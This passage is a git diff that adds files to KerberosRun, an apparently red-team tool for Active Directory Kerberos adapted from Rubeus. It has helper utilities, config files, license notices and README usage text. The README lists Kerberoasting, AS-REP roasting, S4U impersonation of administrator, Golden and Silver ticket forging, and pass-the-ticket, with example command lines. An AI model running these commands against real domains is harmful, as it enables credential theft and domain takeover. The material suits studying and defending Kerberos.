+            return String.Format("0x{0:x}", (ulong)Value);
+        }
+
+        public static bool operator ==(LUID x, LUID y)
+        {
+            return (((ulong)x) == ((ulong)y));
+        }
+
+        public static bool operator !=(LUID x, LUID y)
+        {
+            return (((ulong)x) != ((ulong)y));
+        }
+
+        public static implicit operator ulong(LUID luid)
+        {
+            // enable casting to a ulong
+            UInt64 Value = ((UInt64)luid.HighPart << 32);
+            return Value + luid.LowPart;
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/Utils/Utils.cs b/KerberosRun/KerberosRun/Utils/Utils.cs
new file mode 100644
index 0000000..86b8fbe
--- /dev/null
+++ b/KerberosRun/KerberosRun/Utils/Utils.cs
@@ -0,0 +1,83 @@
+using System;
+using System.IO;
+using System.Text.RegularExpressions;
+
+namespace KerberosRun.Utils
+{
+    public static class Utils
+    {
+        // From: https://stackoverflow.com/questions/2972103/how-to-convert-a-string-to-a-hex-byte-array
+        public static byte[] ToHexByteArray(String HexString)
+        {
+            int NumberChars = HexString.Length;
+            byte[] bytes = new byte[NumberChars / 2];
+            for (int i = 0; i < NumberChars; i += 2)
+            {
+                bytes[i / 2] = Convert.ToByte(HexString.Substring(i, 2), 16);
+            }
+            return bytes;
+        }
+
+        public static byte[] StringToByteArray(string str)
+        {
+            System.Text.ASCIIEncoding enc = new System.Text.ASCIIEncoding();
+            return enc.GetBytes(str);
+        }
+
+        public static string ByteArrayToString(byte[] arr)
+        {
+            System.Text.ASCIIEncoding enc = new System.Text.ASCIIEncoding();
+            return enc.GetString(arr);
+        }
+
+
+        //https://github.com/GhostPack/Rubeus/blob/master/Rubeus/lib/Helpers.cs#L46
+        public static bool IsBase64String(string s)
+        {
+            s = s.Trim();
+            return (s.Length % 4 == 0) && Regex.IsMatch(s, @"^[a-zA-Z0-9\+/]*={0,3}$", RegexOptions.None);
+        }
+
+
+        static public string MakeTicketFileName(string username, string[] sname = null)
+        {
+            string name;
+            if (sname == null)
+            {
+                name = $"{DateTime.Now:yyyyMMddHHmmss}_" + username + "_TGT.kirbi";
+            }
+            else
+            {
+                name = $"{DateTime.Now:yyyyMMddHHmmss}_" + username + "_" + sname[0] + "@" + sname[1] + "_TGS.kirbi";
+            }
+            return name;
+        }
+
+        //https://github.com/GhostPack/Rubeus/blob/master/Rubeus/lib/Helpers.cs#L311
+        static public bool WriteBytesToFile(string filename, byte[] data, bool overwrite = false)
+        {
+            bool result = true;
+            string filePath = Path.GetFullPath(filename);
+
+            try
+            {
+                if (!overwrite)
+                {
+                    if (File.Exists(filePath))
+                    {
+                        throw new Exception(String.Format("{0} already exists! Data not written to file.\r\n", filePath));
+                    }
+                }
+                File.WriteAllBytes(filePath, data);
+                Console.WriteLine("[+] Ticket is written to {0}", filePath);
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("\r\nException: {0}", e.Message);
+                result = false;
+            }
+
+            return result;
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/app.config b/KerberosRun/KerberosRun/app.config
new file mode 100644
index 0000000..86a946b
--- /dev/null
+++ b/KerberosRun/KerberosRun/app.config
@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="utf-8"?>
+<configuration>
+  <runtime>
+    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
+      <dependentAssembly>
+        <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />
+      </dependentAssembly>
+      <dependentAssembly>
+        <assemblyIdentity name="System.Security.Cryptography.Pkcs" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
+        <bindingRedirect oldVersion="0.0.0.0-4.1.1.0" newVersion="4.1.1.0" />
+      </dependentAssembly>
+    </assemblyBinding>
+  </runtime>
+</configuration>
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun/packages.config b/KerberosRun/KerberosRun/packages.config
new file mode 100644
index 0000000..d7e9bbb
--- /dev/null
+++ b/KerberosRun/KerberosRun/packages.config
@@ -0,0 +1,15 @@
+<?xml version="1.0" encoding="utf-8"?>
+<packages>
+  <package id="CommandLineParser" version="1.9.71" targetFramework="net472" />
+  <package id="Costura.Fody" version="4.0.0" targetFramework="net472" />
+  <package id="Fody" version="5.0.6" targetFramework="net472" developmentDependency="true" />
+  <package id="Kerberos.NET" version="4.0.0-g" targetFramework="net472" />
+  <package id="Microsoft.Extensions.Logging.Abstractions" version="3.1.2" targetFramework="net472" />
+  <package id="System.Buffers" version="4.5.0" targetFramework="net472" />
+  <package id="System.IO.Pipelines" version="4.7.0" targetFramework="net472" />
+  <package id="System.Memory" version="4.5.3" targetFramework="net472" />
+  <package id="System.Numerics.Vectors" version="4.4.0" targetFramework="net472" />
+  <package id="System.Runtime.CompilerServices.Unsafe" version="4.5.2" targetFramework="net472" />
+  <package id="System.Security.Cryptography.Pkcs" version="4.7.0" targetFramework="net472" />
+  <package id="System.Threading.Tasks.Extensions" version="4.5.2" targetFramework="net472" />
+</packages>
\ No newline at end of file
diff --git a/KerberosRun/README.md b/KerberosRun/README.md
new file mode 100644
index 0000000..942fd76
--- /dev/null
+++ b/KerberosRun/README.md
@@ -0,0 +1,36 @@
+# KerberosRun
+
+
+
+
+    Usage: KerberosRun.exe -h
+
+    --Kerberoast    Kerberoasting
+        --User      (A valid username)
+        --Pass      (A valid password)
+        --Domain    (A valid domain name)
+        --SPN       (Target SPN for Kerberoasting)
+        --Verbose
+        
+    --Asreproast    ASREPRoasting
+        --User      (A valid username that does not require PreAuth)
+        --Domain    (A valid domain name)
+        --Format    Output Hash format (John/Hashcat, Default: Hashcat)
+        --Verbose
+
+    --S4U2Self      Service for User to Self
+        --User      (A valid username that has SPN set)
+        --Pass      (A valid password)
+        --Domain    (A valid domain name)
+        --ImperonsateUser  (A user to impersonate)
+        --Verbose
+
+    --S4U           S4U2Self and S4U2Proxy
+        --User      (A valid username that has SPN set)
+        --Pass      (A valid password)
+        --Domain    (A valid domain name)
+        --ImperonsateUser  (A user to impersonate)
+        --SPN       (Target SPN for impersonate user)
+        --Verbose
+
+    Example:  .\KerberosRun.exe --s4u --domain corplab.local --user username --pass password --impersonateuser administrator --spn ldap/dc1.corplab.local
diff --git a/NOTICES b/NOTICES
new file mode 100644
index 0000000..aadf28f
--- /dev/null
+++ b/NOTICES
@@ -0,0 +1,17 @@
+KerberosRun uses a library distributed under the same MIT license.
+
+License for Kerberos.NET
+---------------------------------
+Copyright (c) .NET Foundation and Contributors. All rights reserved.
+The MIT License (MIT)
+
+https://github.com/dotnet/Kerberos.NET/blob/develop/LICENSE
+
+Some code in KerberosRun were taken from the tool Rubues (https://github.com/GhostPack/Rubeus) which is under a different license.
+
+License for Rubeus
+---------------------------------
+Copyright (c) 2018, Will Schroeder. All rights reserved.
+BSD 3-Clause License
+
+https://github.com/GhostPack/Rubeus/blob/master/LICENSE
\ No newline at end of file
diff --git a/README.md b/README.md
index 8fda96f..c7472a3 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,16 @@
-# Authentication Flow Details
+
+# KerberosRun
+
+KerberosRun is a little tool I use to study Kerberos internals together with my [ADCollector](https://github.com/dev-2null/ADCollector). I'll try to learn and implement stuff from [Rubeus](https://github.com/GhostPack/Rubeus), also something not in Rubeus.  
+
+KerberosRun uses the [Kerberos.NET](https://github.com/dotnet/Kerberos.NET) library built by [Steve Syfuhs](https://twitter.com/stevesyfuhs). It is heavily adapated from [Harmj0y](https://twitter.com/harmj0y)'s Rubeus project (some code were taken directly from this project). 
+
+[dev2null](https://twitter.com/dev2nulI) is the primary author of this project. My colleague [Constantin](https://twitter.com/_Herberos) is the collaborator who helped me build up the tool, had a lot of discussions with me and gave me ideas. 
+
+Thanks Steve for builting up this great library and having discussions with me to solve code problems. Thanks Harmj0y (and other authors) for the concepts and weaponization in Rubeus. Special thanks to [@_dirkjan](https://twitter.com/_dirkjan) for helping me out regarding the KRBCRED structure and other questions.
+
+
+## Authentication Flows
 
 [AS Exchange](Authentication/AS_Exchange_DecryptedTGT.md)
 
@@ -6,71 +18,96 @@
 
 [TGS Exchange: S4U](Authentication/TGS_Exchange_S4U.md)
 
-[TGS Exchange: Decrypted With PAC](Authentication/TGS_Exchange_DecryptedWithPAC.md)
+[TGS Exchange: Decrypted PAC](Authentication/TGS_Exchange_DecryptedWithPAC.md)
 
 [All In One](Authentication/AllInOne.md)
 
 
+## Usage
+```powershell
+PS C:\Users\dev2null\Desktop> .\KerberosRun.exe    
 
-# KerberosRun
+   __           __
+  / /_____ ____/ /  ___ _______  ___ ______ _____
+ /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \
+/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/
+
+  v1.0.0
 
+Usage: KerberosRun.exe -h
 
-    Usage: KerberosRun.exe -h
+    [--AskTGT]              Ask for a TGT
+        --User*             A valid username
+        --Pass              A valid password
 
-    --Kerberoast            Kerberoasting
-        --User*             (A valid username)
-        --Pass              (A valid password)
-     Or --RC4/AES128/AES256 (A valid hash)
-        --Domain            (A valid domain name, default: current domain)
+    [--AskTGS]              Ask for a TGS
+        --User*             A valid username
+        --Pass              A valid password
+        --SPN*              Target SPN for the service request
+
+    [--Kerberoast]          Kerberoasting
+        --User*             A valid username
+        --Pass              A valid password
         --SPN*              Target SPN for Kerberoasting
 
-    --Asreproast            ASREPRoasting
-        --User*             (A valid username that does not require PreAuth)
-        --Domain            (A valid domain name, default: current domain)
+    [--Asreproast]          ASREPRoasting
+        --User*             A valid username that does not require PreAuth
         --Format            Output Hash format (John/Hashcat, Default: Hashcat)
 
-    --S4U2Self              Service for User to Self
-        --User*             (A valid username that has SPN set)
-        --Pass              (A valid password)
-     Or --RC4/AES128/AES256 (A valid hash)
-        --Domain            (A valid domain name, default: current domain)
-        --ImperonsateUser*  (A user to impersonate)
-        --PTT               Pass the ticket into current session
+    [--S4U2Self]            Service for User to Self
+        --User*             A valid username that has SPN set
+        --Pass              A valid password
+        --ImperonsateUser*  A user to impersonate
 
-    --S4U                   S4U2Self and S4U2Proxy
+    [--S4U]                 S4U2Self and S4U2Proxy
         --User*             A valid username that has SPN set
-        --Pass              (A valid password)
-     Or --RC4/AES128/AES256 (A valid hash)
-        --Domain            (A valid domain name, default: current domain)
-        --Imperonsate*      (A user to impersonate)
+        --Pass              A valid password
+        --Imperonsate*      A user to impersonate
         --SPN*              Target SPN for impersonate user
-        --PTT               Pass the ticket into current session
 
-    --Golden                Build a Golden Ticket
+    [--Golden]              Build a Golden Ticket
         --RC4/AES128/AES256 krbtgt account hash
         --DomainSid*        Domain SIDs
-        --Domain            (A valid domain name, default: current domain)
         --UserID            User ID (default: 500)
         --User*             User name for the golden ticket
-        --PTT               (Pass the ticket into current session)
 
-    --Sliver                Make a Sliver Ticket
+    [--Sliver]              Make a Sliver Ticket
         --RC4/AES128/AES256 Service account hash
         --DomainSid*        Domain SID
-        --Domain            (A valid domain name, default: current domain)
         --Service*          Service name (HTTP/CIFS/HOST...)
         --Host*             Target Servers
         --User*             User name for the sliver ticket
-        --PTT               (Pass the ticket into current session)
 
-    --Ticket                Pass base64 encoded kirbi ticket into current session
+    [--Ticket]              Pass base64 encoded kirbi ticket into current session
+
+     --Domain            A valid domain name (default: current domain)
+     --RC4/AES128/AES256 A valid hash (alternative way for authentication)
+     --Verbose           Verbose mode
+     --Outfile           Write the ticket to a kirbi file under the current directory
+     --PTT               Pass the ticket into current session
+     --DecryptTGT        Supply the krbtgt hash and decrypt the TGT ticket
+     --DecryptTGS        Supply the service account hash and decrypt the TGS ticket
+     --DecryptEtype   The encryption type of the hash for decrypting tickets (rc4/aes128/aes256)
+     --SrvName           The service account name for decrypting TGS
 
-    Example:
+
+Example:
+        .\KerberosRun.exe --Asktgt --user username --pass password --verbose --outfile --decrypttgt [krbtgtHash] --decryptetype aes256
+        .\KerberosRun.exe --Asktgs --user username --pass password --spn service/srv.domain.com --verbose --outfile
         .\KerberosRun.exe --Asreproast --user username --verbose
-        .\KerberosRun.exe --Kerberoast --user username --pass password --spn service/srv.domain.com
         .\KerberosRun.exe --Kerberoast --user username --rc4 [RC4Hash] --spn service/srv.domain.com
         .\KerberosRun.exe --S4U2Self --user username --aes128 [AES128Hash] --impersonateuser administrator --verbose
         .\KerberosRun.exe --S4U --user username --aes256 [AES256Hash] --impersonateuser administrator --spn ldap/dc1.domain.com --ptt
-        .\KerberosRun.exe --golden --user administrator --userid 500 --domainsid  [DomainSID] --RC4 [krbtgtHash] --ptt
-        .\KerberosRun.exe --sliver --user administrator --domainsid  [DomainSID] --RC4 [srvHash] --Service HTTP --HOST DC01$ -ptt
-        .\KerberosRun.exe --Ticket Base64EncodedKirbiString
+        .\KerberosRun.exe --Golden --user administrator --domain domain.com --userid 500 --domainsid  [DomainSID] --RC4 [krbtgtHash] --ptt
+        .\KerberosRun.exe --Sliver --user administrator --domain domain.com --domainsid  [DomainSID] --RC4 [srvHash] --Service HTTP --HOST DC01$ -ptt
+        .\KerberosRun.exe --Ticket Base64EncodedKirbiString/KirbiTicketFiles
+```
+
+## Sample Commands & Results
+
+| [AskTGT](Authentication/Samples/AskTGT.md) | [AskTGS](Authentication/Samples/AskTGS.md) | [Asreproast](Authentication/Samples/Asreproast.md) | [Kerberoast](Authentication/Samples/Kerberoast.md) | [S4U2Self](Authentication/Samples/S4U2Self.md) | [S4U](Authentication/Samples/S4U.md) | [Golden](Authentication/Samples/Golden.md) | [Sliver](Authentication/Samples/Sliver.md) |
+
+
+
+## License
+KerberosRun has an MIT License. See the [License File](/LICENSE) for more details. Also see the [Notices file](/NOTICES) for more information on the licenses of projects this depends on.
\ No newline at end of file